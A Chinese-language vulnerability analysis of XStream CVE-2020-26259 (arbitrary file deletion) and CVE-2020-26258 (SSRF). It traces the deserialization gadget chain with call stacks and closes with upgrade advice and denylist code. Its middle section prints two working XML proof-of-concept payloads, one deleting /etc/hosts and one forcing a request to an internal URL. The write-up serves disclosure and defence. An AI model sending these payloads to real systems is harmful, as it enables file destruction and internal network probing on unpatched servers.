漏洞详情
CVE-2020-26259:
任意文件删除。
细节
Xstream转换Map的时候会拿到
会计算Map的Key的hash值:
这里的key是jdk.nashorn.internal.objects.NativeString
类型,
继续调用hashCode方法
在C:\Program Files\Java\jdk1.8.0_172\jre\lib\ext\nashorn.jar!\jdk\nashorn\internal\objects\NativeString的hashCode方法中
调用这里:
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
指定class的toString方法,
这里的InputStream是
<is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
指定的class类型。
在其close方法中触发了文件删除操作:
部分调用栈:
close:145, ReadAllStream$FileStream (com.sun.xml.internal.ws.util)
get:183, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)
在com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data
的get方法中,调用了InpuStream(这里是指定的com.sun.xml.internal.ws.util.ReadAllStream$FileStream
)的close方法,而在这个特殊的InputStream里进行了删除临时文件操作,实现了任意文件删除。
CVE-2020-26258:
SSRF
细节
调用栈:
getInputStream:107, URLDataSource (javax.activation)
get:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)
poc
[CVE-2020-26258] SSRF
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='javax.activation.URLDataSource'>
<url>http://localhost:8080/internal/:</url>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
[CVE-2020-26259]任意文件删除
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
<tempFile>/etc/hosts</tempFile>
</is>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
修复建议
升级至 1.4.15 版本,下载链接为:
https://x-stream.github.io/changes.html#1.4.15
临时修补建议
低于 1.4.15 的不同版本用户可以按照以下代码设置黑名单:
- 使用 XStream 1.4.14 的用户,只需在 XStream 的设置代码中添加两行即可:
xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
- 使用 XStream 1.4.13 的用户,只需在XStream的设置代码中添加三行代码即可:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
- 使用 XStream 1.4.7 到 1.4.12 的用户,需要设置多个黑名单:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
- 使用 XStream 1.4.6 或更低版本的用户可以注册自己的 Converter ,以防止反序列化当前已知的有危害的 Java 类型。
xstream.registerConverter(new Converter() {
public boolean canConvert(Class type) {
|type.getName().equals("javax.imageio.ImageIO$ContainsFilter")|type.getName().equals("jdk.nashorn.internal.objects.NativeString")| |
|type == java.lang.Void.class|void.class|Proxy.isProxy(type)|
|type.getName().startsWith("javax.crypto.")|type.getName().endsWith("$LazyIterator")|type.getName().endsWith(".ReadAllStream$FileStream"));|
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
}, XStream.PRIORITY_LOW);
参考
- https://mp.weixin.qq.com/s/DkSt4U_C9ZnMxPd5y8aBtg
- http://x-stream.github.io/CVE-2020-26258.html
- http://x-stream.github.io/CVE-2020-26259.html
- CVE-2020-26217 XStream远程代码执行漏洞分析
- https://lightless.me/archives/xstream-rce-analysis.html
杂
这个组件对漏洞的修复方式也是黑名单的,会不会也出现像fastjson一样的情况。